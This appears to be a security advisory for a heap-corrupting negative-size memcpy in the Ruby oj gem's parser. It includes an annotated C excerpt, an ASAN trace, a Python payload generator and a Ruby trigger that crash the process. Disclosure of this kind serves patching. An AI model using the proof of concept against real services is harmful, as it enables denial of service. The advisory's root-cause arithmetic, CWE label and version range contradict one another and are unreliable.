GHSA-9cv6-qcjw-4grx

Source

https://github.com/advisories/GHSA-9cv6-qcjw-4grx

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-9cv6-qcjw-4grx/GHSA-9cv6-qcjw-4grx.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-9cv6-qcjw-4grx

Aliases

CVE-2026-54900

Published

2026-06-19T20:47:23Z

Modified

2026-06-19T21:00:18.597149553Z

Severity

8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator

Summary

Oj: Negative-Size memcpy in Oj::Parser create_id Attribute Handling

Details

Summary

Oj::Parser#parse in usual mode with create_id enabled is vulnerable to heap corruption via a negative-size memcpy. When a JSON object key is exactly 65,535 bytes long, an integer truncation in form_attr (usual.c:63) converts the length to -1 before passing it to memcpy. This causes memcpy to copy SIZE_MAX bytes (interpreted as a huge size_t), corrupting heap memory and crashing the process.

Version

Software: oj gem
Affected: all versions with ext/oj/usual.c
Latest tested: 3.17.1 (confirmed present)

Details

ext/oj/usual.c, form_attr:

// usual.c:55–64
static ID form_attr(const char *str, size_t slen) {
    char        buf[4096];
    // ...
    int  blen = (int)slen + 1;    // ← truncates: 65535 + 1 = 65536 → wraps to 0
                                  //   or: 65535 cast to int = 65535 (fits),
                                  //   but blen = 65536 → INT overflow on +1 if slen=INT_MAX
    // ...
    memcpy(buf, "@", 1);
    memcpy(buf + 1, str, (size_t)blen);  // ← size_t(-1) = SIZE_MAX
}

The cache (cache_intern) uses a fixed 65,536-byte slab. When slen = 65535, the arithmetic wraps and memcpy is called with (size_t)-1.

ASAN report:

==80452==ERROR: AddressSanitizer: negative-size-param: (size=-1)
    #0 memcpy
    #1 form_attr          /ext/oj/usual.c:63
    #2 cache_intern       /ext/oj/cache.c:326
    #3 get_attr_id        /ext/oj/usual.c:186
    #4 close_object_create  /ext/oj/usual.c:374
    #5 parse              /ext/oj/parser.c:693
    #6 parser_parse       /ext/oj/parser.c:1408
0x531000528800 is located 0 bytes inside of 65536-byte region [0x531000528800, 0x531000538800)

Reproduce

Generate the payload:

key = 'A' * 65535
with open('poc.json', 'w') as f:
    f.write('{"json_class":"Oj::Bag","' + key + '":1}')

Trigger:

require 'oj'
Oj::Parser.new(:usual, create_id: 'json_class').parse(STDIN.read)

Database specific

{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-416"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T20:47:23Z"
}

References

Affected packages

RubyGems / oj

Package

Name: oj
Purl: pkg:gem/oj

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.17.3

Affected versions

0.*

0.5

0.5.1

0.5.2

0.6.0

0.7.0

0.8.0

0.9.0

1.*

1.0.0

1.0.1

1.0.2

1.0.3

1.0.4

1.0.5

1.0.6

1.1.0

1.1.1

1.2.0

1.2.1

1.2.2

1.2.3

1.2.4

1.2.5

1.2.6

1.2.7

1.2.8

1.2.9

1.2.10

1.2.11

1.2.12

1.2.13

1.3.0

1.3.2

1.3.4

1.3.5

1.3.6

1.3.7

1.4.0

1.4.1

1.4.2

1.4.3

1.4.4

1.4.5

1.4.6a2

1.4.6

1.4.7

2.*

2.0.0

2.0.1

2.0.2

2.0.3

2.0.4

2.0.5

2.0.6

2.0.7

2.0.8

2.0.9

2.0.10

2.0.11

2.0.12

2.0.13

2.0.14

2.1.0

2.1.1

2.1.2

2.1.3

2.1.4

2.1.6

2.1.7

2.2.0

2.2.1

2.2.2

2.2.3

2.3.0

2.4.0

2.4.1

2.4.2

2.4.3

2.5.1

2.5.2

2.5.3

2.5.4

2.5.5

2.6.0

2.6.1

2.7.0

2.7.1

2.7.2

2.7.3

2.8.0

2.8.1

2.9.0

2.9.1

2.9.2

2.9.3

2.9.4

2.9.5

2.9.6

2.9.7

2.9.8

2.9.9

2.10.0

2.10.1

2.10.2

2.10.3

2.10.4

2.11.0

2.11.1

2.11.2

2.11.3

2.11.4

2.11.5

2.12.0

2.12.1

2.12.2

2.12.3

2.12.4

2.12.5

2.12.6

2.12.7

2.12.8

2.12.9

2.12.10

2.12.11

2.12.12

2.12.13

2.12.14

2.13.0

2.13.1

2.14.0

2.14.1

2.14.2

2.14.3

2.14.4

2.14.5

2.14.6

2.15.0

2.15.1

2.16.0

2.16.1

2.17.0

2.17.1

2.17.2

2.17.3

2.17.4

2.17.5

2.18.0

2.18.1

2.18.2

2.18.3

2.18.4

2.18.5

3.*

3.0.0

3.0.1

3.0.2

3.0.3

3.0.4

3.0.5

3.0.6

3.0.7

3.0.8

3.0.9

3.0.10

3.0.11

3.1.0

3.1.2

3.1.3

3.1.4

3.2.0

3.2.1

3.3.0

3.3.1

3.3.2

3.3.3

3.3.4

3.3.5

3.3.6

3.3.7

3.3.8

3.3.9

3.3.10

3.4.0

3.5.0

3.5.1

3.6.0

3.6.2

3.6.3

3.6.4

3.6.5

3.6.6

3.6.7

3.6.8

3.6.9

3.6.10

3.6.11

3.6.12

3.6.13

3.7.0

3.7.1

3.7.2

3.7.3

3.7.4

3.7.5

3.7.6

3.7.7

3.7.8

3.7.9

3.7.10

3.7.11

3.7.12

3.8.0

3.8.1

3.9.0

3.9.1

3.9.2

3.10.0

3.10.1

3.10.2

3.10.3

3.10.5

3.10.6

3.10.7

3.10.8

3.10.9

3.10.10

3.10.11

3.10.12

3.10.13

3.10.14

3.10.15

3.10.16

3.10.17

3.10.18

3.11.0

3.11.1

3.11.2

3.11.3

3.11.4

3.11.5

3.11.6

3.11.7

3.11.8

3.12.0

3.12.1

3.12.2

3.12.3

3.13.0

3.13.1

3.13.2

3.13.3

3.13.4

3.13.5

3.13.6

3.13.7

3.13.8

3.13.9

3.13.10

3.13.11

3.13.12

3.13.13

3.13.14

3.13.15

3.13.16

3.13.17

3.13.18

3.13.19

3.13.20

3.13.21

3.13.22

3.13.23

3.14.0

3.14.1

3.14.2

3.14.3

3.15.0

3.15.1

3.16.0

3.16.1

3.16.2

3.16.3

3.16.4

3.16.5

3.16.6

3.16.7

3.16.8

3.16.9

3.16.10

3.16.11

3.16.12

3.16.13

3.16.14

3.16.15

3.16.16

3.16.17

3.17.0

3.17.1

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-9cv6-qcjw-4grx/GHSA-9cv6-qcjw-4grx.json"

last_known_affected_version_range

"< 3.17.2"